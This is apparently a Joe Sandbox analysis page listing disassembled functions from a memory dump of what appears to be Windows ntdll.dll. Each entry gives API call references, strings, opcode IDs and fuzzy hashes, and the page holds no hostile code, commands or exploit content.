Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExclusiveHeapLock$AcquireAllocateControlErrorFreeLastReleaseTraceWin32memset
String ID:
API String ID: 375855687-0
Opcode ID: 2880faaf89b9b5c457b11d19d8cd1ca2179b3744ab906323fa6f9fffdb0334fc
Instruction ID: fbc9ef62dee474f8e5134a7954172cc62ad9ce442e17af92cb245e4f8981ae0c
Opcode Fuzzy Hash: 2880faaf89b9b5c457b11d19d8cd1ca2179b3744ab906323fa6f9fffdb0334fc
Instruction Fuzzy Hash: FC419F71A002A89BCF21CF68D940BDA77B5EF85710F4100AAE949AB380DB74DE81CB95

Uniqueness

Uniqueness Score: -1.00%

Function 7267341B, Relevance: 13.6, APIs: 9, Instructions: 131nativeCOMMON

Download Yara Rule

APIs

memset.210A(?,00000000,000000A0,00000000,00000000,00000024), ref: 72673457
RtlRunOnceExecuteOnce.210A(727386B0,72676A60,00000000,00000000,00000000,00000000,00000024), ref: 7267347E
ZwTraceControl.210A(0000000F,?,000000A0,?,000000A0,?,00000000,00000000,00000024), ref: 726734C9
memcmp.210A(00000000,726250A8,00000010,0000000F,?,000000A0,?,000000A0,?,00000000,00000000,00000024), ref: 72673506
RtlNtStatusToDosError.210A(00000000,727386B0,72676A60,00000000,00000000,00000000,00000000,00000024), ref: 726B4CD5

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Once$ControlErrorExecuteStatusTracememcmpmemset
String ID:
API String ID: 1949686928-0
Opcode ID: d2b6bb84860e458654917732f06fc265035a33081d878b883018ce8d5b68b24a
Instruction ID: a3e1a8f8bf2f1903395afb6380a20015bbb892cc00a8066b0f6cee3251f69949
Opcode Fuzzy Hash: d2b6bb84860e458654917732f06fc265035a33081d878b883018ce8d5b68b24a
Instruction Fuzzy Hash: 3241D1716403589FEB26CF18DD80B9A7BBAAF05710F1000ABE9469B3C1D774DE50CB95

Uniqueness

Uniqueness Score: -1.00%

Function 7266E0E8, Relevance: 13.6, APIs: 9, Instructions: 104COMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.210A(00000001,?,00000000), ref: 7266E13D
RtlAcquireSRWLockExclusive.210A(?,00000001,?,00000000), ref: 7266E159
RtlReleaseSRWLockExclusive.210A(?), ref: 7266E1A0
RtlReleaseSRWLockExclusive.210A(?,00000001,?,00000000), ref: 7266E1D2
RtlReleaseSRWLockExclusive.210A(?,?), ref: 7266E1E3

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExclusiveLock$Release$AcquireCurrentServiceSession
String ID:
API String ID: 4254861812-0
Opcode ID: d838cf1190ab199dc34ed980c1bee171a92d880a05f12bfe182f5bafe8bf4e7e
Instruction ID: 3c341acbe396d5d02383db2e720717694f66d8be7b6c52e9ec8f8f0c057912e3
Opcode Fuzzy Hash: d838cf1190ab199dc34ed980c1bee171a92d880a05f12bfe182f5bafe8bf4e7e
Instruction Fuzzy Hash: A4310375B005C6AFD70ADBB8C880FE9FB69BF41204F14416BC01887281DB39695AD795

Uniqueness

Uniqueness Score: -1.00%

Function 7267D2FE, Relevance: 13.6, APIs: 9, Instructions: 79memorynativeCOMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.210A(?,00000000,?,00000000,?,?,72643AA2,?,?,?,?,?,00000001,00000000,?,?), ref: 7267D315
RtlAcquireSRWLockExclusive.210A(?,?,00000000,?,00000000,?,?,72643AA2,?,?,?,?,?,00000001,00000000,?), ref: 7267D31E

Part of subcall function 72661ED0: RtlDllShutdownInProgress.210A(00000000), ref: 72661F0A
Part of subcall function 72661ED0: ZwWaitForAlertByThreadId.210A(?,00000000,?,?,?,?,?,?,?,00000000), ref: 72661FF3

RtlGetCurrentServiceSessionId.210A(?,?,00000000,?,00000000,?,?,72643AA2,?,?,?,?,?,00000001,00000000,?), ref: 7267D32E
ZwUnsubscribeWnfStateChange.210A(?,?,?,00000000,?,00000000,?,?,72643AA2,?,?,?,?,?,00000001,00000000), ref: 7267D34E
RtlReleaseSRWLockExclusive.210A(?,?,?,?,00000000,?,00000000,?,?,72643AA2,?,?,?,?,?,00000001), ref: 7267D36A
RtlFreeHeap.210A(?,00000000,?,?,?,?,?,00000000,?,00000000,?,?,72643AA2,?), ref: 7267D385
RtlReleaseSRWLockExclusive.210A(?,?,?,?,00000000,?,00000000,?,?,72643AA2,?,?,?,?,?,00000001), ref: 7267D393
RtlReleaseSRWLockExclusive.210A(?,?,?,00000000,?,00000000,?,?,72643AA2,?,?,?,?,?,00000001,00000000), ref: 7267D3A0
RtlFreeHeap.210A(?,00000000,00000000,?,?,?,?,00000000,?,00000000,?,?,72643AA2,?), ref: 726BA9E4

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExclusiveLock$Release$AcquireFreeHeap$AlertChangeCurrentProgressServiceSessionShutdownStateThreadUnsubscribeWait
String ID:
API String ID: 3923771875-0
Opcode ID: a69ef67a0bbd65aeca5e0b953e7c78a455810195c1616c24dbea13f6dd1c3acb
Instruction ID: 1adc31c083a7b478ae36482488435be6d283cf9c5e5e203069bc17342c516a10
Opcode Fuzzy Hash: a69ef67a0bbd65aeca5e0b953e7c78a455810195c1616c24dbea13f6dd1c3acb
Instruction Fuzzy Hash: B7210071200680EBC7229F2DC840F16BBBAFF41364F104A6BE1458B6E1DB35E801CB98

Uniqueness

Uniqueness Score: -1.00%

Function 7265B1B0, Relevance: 13.1, APIs: 6, Strings: 1, Instructions: 876libraryCOMMON

Download Yara Rule

APIs

LdrRscIsTypeExist.210A(00000000,MUI,?,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000008,?), ref: 7265B2E1

Strings

MUI, xrefs: 7265B2DE, 7265BB5D, 7265BE37

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExistType
String ID: MUI
API String ID: 2681982878-1339004836
Opcode ID: dc7de6c7649e42245091596b16548f3e1d766dde5839bed798674046ebd611b1
Instruction ID: 2fa24d551021493fa45cf8862cc6e6946b6d244c3fde1013540008ffa8763022
Opcode Fuzzy Hash: dc7de6c7649e42245091596b16548f3e1d766dde5839bed798674046ebd611b1
Instruction Fuzzy Hash: 96724C75E00219CFDB15CF6AC8907ADBBB6FF44314F14816BE85AAB289D7309986CF50

Uniqueness

Uniqueness Score: -1.00%

Function 726FE4E9, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 178nativeCOMMON

Download Yara Rule

APIs

memset.210A(?,00000000,000000AA,727366C0,?), ref: 726FE542
RtlInitUnicodeString.210A(?,DefaultFallback,?,727366C0,?), ref: 726FE587

Part of subcall function 7264E328: RtlAllocateHeap.210A(?,00000008,?,00000000,?,00000001), ref: 7264E36B
Part of subcall function 7264E328: ZwQueryValueKey.210A(?,?,00000002,00000000,?,00000000,?,00000008,?,00000000,?,00000001), ref: 7264E38A
Part of subcall function 7264E328: memcpy.210A(00000000,0000000C,?,?,?,00000002,00000000,?,00000000,?,00000008,?,00000000,?,00000001), ref: 7264E3BB
Part of subcall function 7264E328: RtlFreeHeap.210A(?,00000000,00000000,?,?,00000002,00000000,?,00000000,?,00000008,?,00000000,?,00000001), ref: 7264E3DB

RtlInitUnicodeString.210A(?,?,00000001,?,?,?,?,DefaultFallback,?,727366C0,?), ref: 726FE5EA
ZwEnumerateValueKey.210A(?,00000000,00000001,?,00000200,?,00000001,?,?,?,?,DefaultFallback,?,727366C0,?), ref: 726FE6B1
RtlInitUnicodeString.210A(?,?,?,00000000,00000001,?,00000200,?,00000001,?,?,?,?,DefaultFallback,?,727366C0), ref: 726FE704
RtlCompareUnicodeStrings.210A(?,?,?,00000000,00000001,?,?,?,00000000,00000001,?,00000200,?,00000001,?,?), ref: 726FE727

Strings

DefaultFallback, xrefs: 726FE57B

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Unicode$InitString$HeapValue$AllocateCompareEnumerateFreeQueryStringsmemcpymemset
String ID: DefaultFallback
API String ID: 634882612-3328677554
Opcode ID: 53e0042b9884226b7e5b5b0b15e57bc3dec884c50eb61a09ed88ea9ab8e3167f
Instruction ID: 7fc23bc2474f61d1da240e59d0506c754d7b9e981fc63b68f58144276eea8d11
Opcode Fuzzy Hash: 53e0042b9884226b7e5b5b0b15e57bc3dec884c50eb61a09ed88ea9ab8e3167f
Instruction Fuzzy Hash: A8613A759012699BEF65CB18CD88BDEBBB9EB05304F1041EBE90AA2190DB309EC5CF55

Uniqueness

Uniqueness Score: -1.00%

Function 726794B0, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 172nativeCOMMON

Download Yara Rule

APIs

RtlImageNtHeaderEx.210A(00000001,?,00000000,00000000,?,7271FB90,00000044,726B860C,00000000,00000000,00000200,00000001,?,?,?,00000000), ref: 7267955A
ZwQueryVirtualMemory.210A(000000FF,Ubr,00000003,?,00000014,00000000,00000001,?,00000000,00000000,?,7271FB90,00000044,726B860C,00000000,00000000), ref: 726795FB

Part of subcall function 7265DADA: RtlEnterCriticalSection.210A(72736D80,7271F548,00000010,7265CB21,00000001,00000000,00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,?,00000000), ref: 7265DAFB

Strings

LdrpResGetMappingSize Exit, xrefs: 726794DC
LdrpResGetMappingSize Enter, xrefs: 726794CA
Ubr, xrefs: 726795F6

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CriticalEnterHeaderImageMemoryQuerySectionVirtual
String ID: LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit$Ubr
API String ID: 2678244028-410193876
Opcode ID: 20ebf555ca03ebb0527401e76fae3a88d83a4da74570997b75b8cf3a853927d2
Instruction ID: 0c5635feb3714699c731a8d9dbf4363040a5bcd4b6f825eab27072895c8b278e
Opcode Fuzzy Hash: 20ebf555ca03ebb0527401e76fae3a88d83a4da74570997b75b8cf3a853927d2
Instruction Fuzzy Hash: 3051D171A012559FEB06CFBDD980B9977FAAF44754F24012BE902AB3D4E738DA41CB24

Uniqueness

Uniqueness Score: -1.00%

Function 72658080, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 95nativeCOMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.210A(?), ref: 726580A8
ZwProtectVirtualMemory.210A(000000FF,?,?,00000004,?,?), ref: 726580CB
ZwProtectVirtualMemory.210A(000000FF,?,?,00000002,?,000000FF,?,?,00000004,?,?), ref: 72658100
RtlReleaseSRWLockExclusive.210A(?,?), ref: 72658115

Strings

minkernel\ntdll\ldrdload.c, xrefs: 726AAA39
LdrpWriteBackProtectedDelayLoad:Unable to unsuppress the export suppressed functions that is imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 726AAA28
LdrpWriteBackProtectedDelayLoad, xrefs: 726AAA2F

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExclusiveLockMemoryProtectVirtual$AcquireRelease
String ID: LdrpWriteBackProtectedDelayLoad$LdrpWriteBackProtectedDelayLoad:Unable to unsuppress the export suppressed functions that is imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrdload.c
API String ID: 86692458-3792304974
Opcode ID: ef87377fa0223fe0a4009be301e07d2c0cbcfb7463fad2250e1dba0b2d318d83
Instruction ID: c271718b09e4e2cddb4f8ce59cc5a9e860431f43e826fe0f6c709e3b3b1ff26f
Opcode Fuzzy Hash: ef87377fa0223fe0a4009be301e07d2c0cbcfb7463fad2250e1dba0b2d318d83
Instruction Fuzzy Hash: 6F317E72A00209AFDB11DE9DC851BAEBBB9EF44710F14425BEA11EB2C1D730EE40DB94

Uniqueness

Uniqueness Score: -1.00%

Function 7264C330, Relevance: 12.2, APIs: 8, Instructions: 225memorynativeCOMMON

Download Yara Rule

APIs

RtlInitUnicodeStringEx.210A(?,?,?,00000000,00800000), ref: 7264C369
ZwQueryValueKey.210A(00000000,?,00000002,?,00000400,?,?,?,?,00000000,00800000), ref: 7264C395
RtlFreeHeap.210A(?,00000000,00000002,00000000,?,00000002,00000000,00000038,?,00000000,00800000), ref: 726B73CD
RtlAllocateHeap.210A(?,?,00000038,?,?,?,00000000,00800000), ref: 726B73FB
ZwQueryValueKey.210A(00000000,?,00000002,00000000,00000038,?,00000000,00800000), ref: 726B741D
RtlFreeHeap.210A(?,00000000,00000000,00000000,?,00000002,00000000,00000038,?,00000000,00800000), ref: 726B7442
RtlUnicodeStringToInteger.210A(00000000,00000000,00000000,00000000,?,00000002,00000000,00000038,?,00000000,00800000), ref: 726B750A
memcpy.210A(00000000,0000000C,?,00000000,?,00000002,00000000,00000038,?,00000000,00800000), ref: 726B7569

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Heap$FreeQueryStringUnicodeValue$AllocateInitIntegermemcpy
String ID:
API String ID: 3015855070-0
Opcode ID: cb6c7734d371a9bfec267a902030c0b14be646736ece994019e6ca8f8e3d245c
Instruction ID: 0c35ee1d23c5ca46a35dbc71439f0a406c52706a91337c9a8edafd37122fc925
Opcode Fuzzy Hash: cb6c7734d371a9bfec267a902030c0b14be646736ece994019e6ca8f8e3d245c
Instruction Fuzzy Hash: 3E816D77684202DFC717CE1CC880B6A77BAEF84254F24492BED469B285D738DD45CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 72650070, Relevance: 12.1, APIs: 8, Instructions: 141nativeCOMMON

Download Yara Rule

APIs

memset.210A(?,00000000,00000568,727379A0,?,00000000), ref: 726500A3
memset.210A(?,00000000,00000568,727379A0,?,00000000), ref: 726500B2
ZwDuplicateObject.210A(000000FF,?,000000FF,?,00001000,00000000,00000000,?,?,?,727379A0,?,00000000), ref: 726A725B
memset.210A(?,00000000,00000568,000000FF,?,000000FF,?,00001000,00000000,00000000,?,?,?,727379A0,?,00000000), ref: 726A72D5
memset.210A(?,00000000,00000568), ref: 726A731F
ZwClose.210A(00000000,000000FF,?,000000FF,?), ref: 726A7399

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: memset$CloseDuplicateObject
String ID:
API String ID: 528062135-0
Opcode ID: d500e3c77cdcad7c6b0dbef51835b52e96c85e5365cb50f45ac4a63b35536819
Instruction ID: 1f40aeb412d326b6bdef228a76515ce328dce4128f186f980901522d1a2414e2
Opcode Fuzzy Hash: d500e3c77cdcad7c6b0dbef51835b52e96c85e5365cb50f45ac4a63b35536819
Instruction Fuzzy Hash: CC41D272A487549FD3229A1CC990B9FB7B8DF84724F11062BEC5A972C0D774DC44CB96

Uniqueness

Uniqueness Score: -1.00%

Function 72645020, Relevance: 12.1, APIs: 8, Instructions: 133memorynativeCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.210A(?,00000000,?), ref: 72645066
RtlFreeHeap.210A(?,00000000,00000000,00000000,?), ref: 726A19E3

Part of subcall function 72667640: memset.210A(?,00000000,?,?,00000001,00000001,?), ref: 72667727

RtlFreeHeap.210A(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,-00000004,00000000,00000000,00000000,00000000,00000000,?), ref: 726450F8
RtlEnterCriticalSection.210A(727379A0,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,-00000004,00000000,00000000,00000000,00000000,00000000,?), ref: 72645106
RtlLeaveCriticalSection.210A(727379A0,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,-00000004,00000000,00000000,00000000,00000000,00000000,?), ref: 72645134
ZwClose.210A(?,727379A0,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,-00000004,00000000,00000000,00000000,00000000,00000000), ref: 72645149
RtlFreeHeap.210A(?,00000000,?,?,727379A0,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,-00000004,00000000,00000000), ref: 7264515A
RtlFreeHeap.210A(?,00000000,00000000,00000000,00000000,00000000,?,00000000,?), ref: 726A19A1

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Heap$Free$CriticalSection$AllocateCloseEnterLeavememset
String ID:
API String ID: 1968905909-0
Opcode ID: c553ef5fac9e3ea5881f99bd7cbf507afaa1f96f9c473c75d14c56b179f7295c
Instruction ID: 0a5ecd96e836a6ad39abbfe14ba6b27f30eef48c4bc6d06e37f78b9f0d1d7b5b
Opcode Fuzzy Hash: c553ef5fac9e3ea5881f99bd7cbf507afaa1f96f9c473c75d14c56b179f7295c
Instruction Fuzzy Hash: 7041EC766083029BD315DF2DC850B6ABBB5BF54710F10196AEC859B2C5EA30ED01C79A

Uniqueness

Uniqueness Score: -1.00%

Function 72656090, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 444COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.210A(727366C0), ref: 726562C7
RtlLeaveCriticalSection.210A(727366C0), ref: 726562E0

Part of subcall function 7265DB60: RtlpNotOwnerCriticalSection.210A(?,?,?), ref: 7265DB97

RtlpCreateProcessRegistryInfo.210A(?,00000000,00000000,00000000,?,?,?,?,7267F459,00000000,7267F281,00000000,00000000,00000000,727384D8,?), ref: 7265614F

Part of subcall function 72656682: RtlFreeHeap.210A(?,00000000,?,726A6371,727366C0,?,727384D8,?,?,7264DB97,?,00000010,00000000,72738638), ref: 72656698

Strings

0, xrefs: 72656399

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CriticalSection$Rtlp$CreateEnterFreeHeapInfoLeaveOwnerProcessRegistry
String ID: 0
API String ID: 153743458-4108050209
Opcode ID: bd300c23259d3d0736ac59bf30aea983f582df58849091af280c5554b59142ab
Instruction ID: cbdaf9e8fe2495c0f4e656b51c9856da949efd79840b2896d04b020e08422679
Opcode Fuzzy Hash: bd300c23259d3d0736ac59bf30aea983f582df58849091af280c5554b59142ab
Instruction Fuzzy Hash: 9F027971608781CFC716CF2EC590B5ABBF2AF88714F14886EE89A872D4DB34D945CB52

Uniqueness

Uniqueness Score: -1.00%

Function 7265A61E, Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 349libraryCOMMON

Download Yara Rule

APIs

LdrLoadAlternateResourceModuleEx.210A(?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 7265A789

Strings

LdrpLoadResourceFromAlternativeModule, xrefs: 726AB47D
'LDR: %s(), invalid image format of MUI file , xrefs: 726AB482

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: AlternateLoadModuleResource
String ID: 'LDR: %s(), invalid image format of MUI file $LdrpLoadResourceFromAlternativeModule
API String ID: 4200993237-411237641
Opcode ID: 8db52f6c4c32a00ac0842f8e383a464ed0bf10519d29a813321194d16a3ab73d
Instruction ID: cb143c10b2a2d5abead341110ea1be6595712dc3a203e97ea96992a0f3ba8c00
Opcode Fuzzy Hash: 8db52f6c4c32a00ac0842f8e383a464ed0bf10519d29a813321194d16a3ab73d
Instruction Fuzzy Hash: 71D178352083829FD716CF1AC490B6ABBF5BB88754F10492FE8869B2D4D734DD46CB82

Uniqueness

Uniqueness Score: -1.00%

Function 727164FB, Relevance: 10.7, APIs: 7, Instructions: 214filenativememoryCOMMON

Download Yara Rule

APIs

ZwQueryVolumeInformationFile.210A(?,?,00000048,00000018,00000003,00000000,00000000,?), ref: 72716588
RtlAllocateHeap.210A(?,00000008,?,00000000,00000000,?), ref: 727165BB
ZwReadFile.210A(?,00000000,00000000,00000000,?,00000000,?,?,00000000,?,00000008,?,00000000,00000000,?), ref: 727165E8
ZwWriteFile.210A(?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,00000000,00000000,00000000,?), ref: 727166C0
ZwSetInformationFile.210A(?,?,?,00000008,00000014,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?), ref: 72716743
RtlFreeHeap.210A(?,00000000,?,?,00000000,00000000,00000000,?,00000000,?,?,00000000,?,00000008,?,00000000), ref: 72716757
RtlNtStatusToDosError.210A(00000000,?,00000000,?,?,00000000,00000000,00000000,?,00000000,?,?,00000000,?,00000008,?), ref: 72716761

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: File$HeapInformation$AllocateErrorFreeQueryReadStatusVolumeWrite
String ID:
API String ID: 2795052841-0
Opcode ID: b25d935020d7d5bb3b1661af5b9d63d88898e5176e27eff80fbf76dc8987cb76
Instruction ID: cf8d6686d7f43863c9f562dec5bec4dd6e22d35f77b1000cf12a2d8750642ca3
Opcode Fuzzy Hash: b25d935020d7d5bb3b1661af5b9d63d88898e5176e27eff80fbf76dc8987cb76
Instruction Fuzzy Hash: 63812471A0060A9FD711CFA8CA84BDEBBFAEF88754F10842DE556A7254D731EC46CB60

Uniqueness

Uniqueness Score: -1.00%

Function 72675744, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 726B6285
HEAP[%wZ]: , xrefs: 726B6278
((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 726B6290

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: 33d3ceab2c18b3e9f4f9889b3b0015d8a0d4dc2e3942e0bdbe72faaad81aadbd
Instruction ID: cbb8fe1ccd01571c2703a7d88200c39bea75b73a0e88eb9fd15050f9507f6d59
Opcode Fuzzy Hash: 33d3ceab2c18b3e9f4f9889b3b0015d8a0d4dc2e3942e0bdbe72faaad81aadbd
Instruction Fuzzy Hash: B4617F71A00241DFE729CF28D584B6ABBF5FF44304F2485AEE84A8B389D730E851CB91

Uniqueness

Uniqueness Score: -1.00%

Function 7267A0F8, Relevance: 10.7, APIs: 7, Instructions: 165timelibraryCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.210A(00000000,00000001,?,?,7FFE0386), ref: 7267A1B1

Part of subcall function 7267A20E: RtlAcquireSRWLockExclusive.210A(00800008,?,00000000,0000008C,7267F281,00000000,?,727384D8,00000000,00000000), ref: 7267A25B
Part of subcall function 7267A20E: RtlReleaseSRWLockExclusive.210A(00800008,00800008,?,00000000,0000008C,7267F281,00000000,?,727384D8,00000000,00000000), ref: 7267A279

LdrLockLoaderLock.210A(00000000,00000000,00000001,?,?,7FFE0386,?,72646748,00000001), ref: 726B9431
